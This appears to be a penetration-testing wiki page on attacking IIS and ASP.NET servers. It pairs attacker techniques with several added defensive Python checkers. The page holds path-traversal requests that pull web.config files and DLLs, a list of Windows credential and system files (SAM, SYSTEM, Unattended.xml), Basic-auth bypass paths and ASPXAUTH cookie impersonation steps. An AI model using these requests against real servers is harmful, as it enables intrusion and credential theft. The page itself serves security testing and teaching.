# IIS - Internet Information Services
Test executable file extensions:
* asp
* aspx
* config
* php
## Internal IP Address disclosure
On any IIS server that answers with a 302, you can try stripping the Host header and using HTTP/1.0; the Location header in the response may then point to the internal IP address:

```
nc -v domain.com 80
openssl s_client -connect domain.com:443
```

Response disclosing the internal IP:

```
GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
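To check a front end you operate for this leak without relying on `nc`, here is an added Python example (not from the page): it sends the same Host-less HTTP/1.0 request and flags any Location header whose host is a private, loopback or link-local address. The sample response is constructed from the page's example output.

```python
import ipaddress
import socket
from urllib.parse import urlparse

# Constructed sample, modelled on the 302 shown above: what an IIS/Exchange
# front end may answer to an HTTP/1.0 request that carries no Host header.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Cache-Control: no-cache\r\n"
    "Pragma: no-cache\r\n"
    "Location: https://192.168.5.237/owa/\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-FEServer: NHEXCHANGE2016\r\n"
    "\r\n"
)


def leaked_private_hosts(raw_response: str) -> list:
    """Return private, loopback or link-local IPs named in Location-style
    headers of a raw HTTP response (DNS names are ignored)."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    found = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() not in ("location", "content-location"):
            continue
        host = urlparse(value.strip()).hostname
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue                                # a hostname, not a literal IP
        if ip.is_private or ip.is_loopback or ip.is_link_local:
            found.append(str(ip))
    return found


def probe(host: str, port: int = 80, timeout: float = 5.0) -> list:
    """Send the Host-less HTTP/1.0 request to a server you operate and
    report any internal address its redirect discloses."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"GET / HTTP/1.0\r\n\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return leaked_private_hosts(b"".join(chunks).decode("latin-1"))
```

For a TLS-only front end, wrap the socket with the `ssl` module (or reuse the `openssl s_client` command above) before sending the request.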
## Execute .config files
You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: [Download example here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)

More information and techniques to exploit this vulnerability [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/).
## IIS Discovery Bruteforce

Download the list that I have created:

{% file src="../../.gitbook/assets/iisfinal.txt" %}

It was created merging the contents of the following lists:

[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt)\
[http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html](http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html)\
[https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt](https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt)\
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)

Use it without adding any extension; the entries that need one already include it.

## Path Traversal
### Leaking source code
{% hint style="info" %}
In summary, there are several web.config files inside the application's folders with references to "**assemblyIdentity**" files and "**namespaces**". With this information it's possible to learn **where the executables are located** and download them.\
From the **downloaded DLLs** it's also possible to find **new namespaces**, which you should try to access in order to get their web.config file and find further namespaces and assemblyIdentity entries.\
Also, the files **connectionstrings.config** and **global.asax** may contain interesting information.\
Reference: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
{% endhint %}

As in any .NET application, MVC applications have a **web.config** file, where "**assemblyIdentity**" XML tags identify every binary file the application uses.

```markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <configSections>
    <section name="entityFramework" type="System.Data.Entity.Internal.ConfigFile.EntityFrameworkSection, EntityFramework, Version=6.0.0.0, Culture=neutral" requirePermission="false" />
  </configSections>
  <appSettings>
    <add key="webpages:Version" value="3.0.0.0" />
    <add key="webpages:Enabled" value="false" />
    <add key="ClientValidationEnabled" value="true" />
    <add key="UnobtrusiveJavaScriptEnabled" value="true" />
  </appSettings>
  <system.web>
    <authentication mode="None" />
    <compilation debug="true" targetFramework="4.6.1" />
    <httpRuntime targetFramework="4.6.1" />
  </system.web>
  <system.webServer>
    <modules>
      <remove name="FormsAuthentication" />
    </modules>
  </system.webServer>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security.OAuth" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security.Cookies" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Optimization" />
        <bindingRedirect oldVersion="1.0.0.0-1.1.0.0" newVersion="1.1.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="WebGrease" />
        <bindingRedirect oldVersion="0.0.0.0-1.5.2.14234" newVersion="1.5.2.14234" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Helpers" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" />
        <bindingRedirect oldVersion="1.0.0.0-5.2.3.0" newVersion="5.2.3.0" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.WebPages" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.0.0" newVersion="3.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
```

In the previous output you can see references to several "**assemblyIdentity**" entries. These are files that may be located inside the /bin folder. For example: **/bin/WebGrease.dll**.
Other files that could be found in the root directory of a .NET application are **/global.asax**:

```markup
<%@ Application Codebehind="Global.asax.cs" Inherits="WebApplication1.MvcApplication" Language="C#" %>
```

And **/connectionstrings.config**

**Note: this file contains passwords!**

```markup
<connectionStrings>
  <add name="DefaultConnection" connectionString="Data Source=(LocalDb)\MSSQLLocalDB;AttachDbFilename [...]" providerName="System.Data.SqlClient" />
</connectionStrings>
```
#### Namespaces
In addition, .NET MVC applications are structured to define **other web.config files**, whose purpose is to declare the namespaces used by each set of view pages, relieving developers from declaring "@using" namespaces in every file.

```markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
      <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
      <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
    </sectionGroup>
  </configSections>
  <system.web.webPages.razor>
    <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Mvc.Ajax" />
        <add namespace="System.Web.Mvc.Html" />
        <add namespace="System.Web.Optimization" />
        <add namespace="System.Web.Routing" />
        <add namespace="WebApplication1" />
```
#### Downloading DLLs
From the previous response, the declaration of a **custom namespace** (the other namespaces are defaults) suggests that a DLL called "**WebApplication1**" is present in the /bin directory.

```
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded
[...]
```

From the previous output, inside the /bin directory you will also be able to find the DLLs:

* System.Web.Mvc.dll
* System.Web.Mvc.Ajax.dll
* System.Web.Mvc.Html.dll
* System.Web.Optimization.dll
* System.Web.Routing.dll

Let's suppose that the previous DLL imports a namespace called **WebApplication1.Areas.Minded**. An attacker can then infer that other web.config files are present in the application, in guessable/default paths such as **/area-name/Views/**, containing specific configurations that may refer to other DLL files present in the /bin folder.

```markup
GET /download_page?id=..%2f..%2fMinded/Views/web.config HTTP/1.1
Host: example-mvc-application.minded
[...]

HTTP/1.1 200 OK
[...]
<?xml version="1.0"?>
<configuration>
  <configSections>
    <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral">
      <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
      <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral" requirePermission="false" />
    </sectionGroup>
  </configSections>
  <system.web.webPages.razor>
    <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral" />
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="System.Web.Mvc.Ajax" />
        <add namespace="System.Web.Mvc.Html" />
        <add namespace="System.Web.Routing" />
        <add namespace="System.Web.Optimization" />
        <add namespace="WebApplication1" />
        <add namespace="WebApplication1.AdditionalFeatures" />
      </namespaces>
```

Note how in the previous output you can see a new namespace called **WebApplication1.AdditionalFeatures**, which indicates that there is another DLL in the /bin folder called **WebApplication1.AdditionalFeatures.dll**.
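To judge how much a single exposed web.config gives away, here is an added Python example (not from the page or the referenced blog post) that inventories what the file reveals: the assemblyIdentity names, the non-framework Razor namespaces, the /bin DLL paths both imply, and a debug setting a reviewer would want switched off. The sample document is constructed from the fragments above, and the list of framework-default namespaces is an assumption taken from the page's sample output.

```python
import xml.etree.ElementTree as ET

# Constructed sample: the root web.config's assemblyBinding section merged with
# a Views/web.config Razor <namespaces> block, both trimmed from the page.
SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <compilation debug="true" targetFramework="4.6.1" />
  </system.web>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Microsoft.Owin.Security" />
        <bindingRedirect oldVersion="1.0.0.0-3.0.1.0" newVersion="3.0.1.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
  <system.web.webPages.razor>
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="WebApplication1" />
        <add namespace="WebApplication1.AdditionalFeatures" />
      </namespaces>
    </pages>
  </system.web.webPages.razor>
</configuration>
"""

# Namespaces the framework registers by default (assumed list, taken from the
# page's sample output); anything else is treated as application code.
DEFAULT_NAMESPACES = {
    "System.Web.Mvc", "System.Web.Mvc.Ajax", "System.Web.Mvc.Html",
    "System.Web.Optimization", "System.Web.Routing",
}


def disclosed_artifacts(xml_text: str) -> dict:
    """Walk the config once and collect everything it reveals about the app."""
    root = ET.fromstring(xml_text)
    assemblies, namespaces, weak = [], [], []
    for el in root.iter():
        name = el.tag.rsplit("}", 1)[-1]   # drop the {xmlns} prefix ElementTree adds
        if name == "assemblyIdentity" and el.get("name"):
            assemblies.append(el.get("name"))
        elif name == "add" and el.get("namespace"):
            namespaces.append(el.get("namespace"))
        elif name == "compilation" and el.get("debug", "").lower() == "true":
            weak.append("compilation debug=true")   # verbose errors reach clients
    custom = [ns for ns in namespaces if ns not in DEFAULT_NAMESPACES]
    dlls = sorted({f"/bin/{n}.dll" for n in assemblies + custom})
    return {"assemblies": assemblies, "custom_namespaces": custom,
            "expected_dlls": dlls, "weak_settings": weak}
```

Running it over every web.config in a deployment (root, Views, and each area's Views folder) gives the full list of binaries that a traversal bug would expose.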
### Common files

From [here](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)

```
C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml
```
## HTTPAPI 2.0 404 Error

If you see an error like the following one:

![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2).png>)

It means that the server **didn't receive the correct domain name** inside the Host header.\
In order to access the web page, take a look at the served **SSL certificate**: you may find the domain/subdomain name in there. If it isn't there, you may need to **brute force VHosts** until you find the correct one.

## Old IIS vulnerabilities worth looking for
### Microsoft IIS tilde character "~" Vulnerability/Feature – Short File/Folder Name Disclosure

You can try to **enumerate folders and files** inside every discovered folder (even if it's requiring Basic Authentication) using this **technique**.\
The main limitation of this technique, if the server is vulnerable, is that **it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension** of the files.

You can use [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) to test for this vulnerability: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`

![](<../../.gitbook/assets/image (183).png>)

Original research: [https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf](https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf)

You can also use **metasploit**: `use scanner/http/iis_shortname_scanner`
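To see exactly why the technique stops at 6+3 characters, here is an added Python model (not from the page or the scanner) of how Windows derives the 8.3 alias: six characters of the cleaned base name, a `~N` counter, and three of the extension, with no alias at all for names that already fit 8.3. It simplifies the real algorithm: the hash suffix Windows uses after the fourth collision is not modelled, and the allowed character set is an assumption.

```python
import re

# Characters kept in an 8.3 name (assumed set); everything else, including
# spaces and any extra dots in the base name, is dropped when building the alias.
_INVALID = re.compile(r"[^A-Z0-9!#$%&'()\-@^_`{}~]")


def short_name(long_name: str, collision_index: int = 1) -> str:
    """Return the 8.3 alias Windows would create for long_name, or the
    upper-cased name itself when it already fits 8.3 (no alias, no tilde)."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:                        # no extension at all
        base, ext = long_name, ""
    clean_base = _INVALID.sub("", base.upper())
    clean_ext = _INVALID.sub("", ext.upper())
    if (clean_base == base.upper() and clean_ext == ext.upper()
            and len(clean_base) <= 8 and len(clean_ext) <= 3):
        return long_name.upper()
    stem = f"{clean_base[:6]}~{collision_index}"
    return f"{stem}.{clean_ext[:3]}" if clean_ext else stem


def enumerable_prefix(long_name: str):
    """(name, extension) prefixes a short-name disclosure can reveal, or None
    when the file has no alias and is therefore invisible to the technique."""
    alias = short_name(long_name)
    if "~" not in alias:
        return None
    stem, _, ext = alias.partition(".")
    return stem.split("~")[0], ext
```

On the server side, 8.3 alias creation can be turned off per volume with `fsutil 8dot3name set <volume> 1` and existing aliases removed with `fsutil 8dot3name strip`; files whose names already fit 8.3 never get an alias and so are not found this way.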
### Basic Authentication bypass
**Bypass** a Basic authentication (**IIS 7.5**) trying to access: `/admin:$i30:$INDEX_ALLOCATION/admin.php` or `/admin::$INDEX_ALLOCATION/admin.php`

You can try to **mix** this **vulnerability** with the previous one to find new **folders** and **bypass** the authentication.

## ASP.NET Trace.AXD enabled debugging
ASP.NET includes a debugging mode whose handler is `trace.axd`.
It keeps a very detailed log of all requests made to an application over a period of time.
This information includes remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.

[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)

![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)

## ASPXAUTH Cookie
ASPXAUTH uses the following info:

* **`validationKey`** (string): hex-encoded key to use for signature validation.
* **`decryptionMethod`** (string): (default "AES").
* **`decryptionIV`** (string): hex-encoded initialization vector (defaults to a vector of zeros).
* **`decryptionKey`** (string): hex-encoded key to use for decryption.

However, some people will use the **default values** of these parameters and will use **the email of the user as the cookie**. Therefore, if you can find a web application on the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to **use the cookie from the second server in the first one** and impersonate the user.\
This attack worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).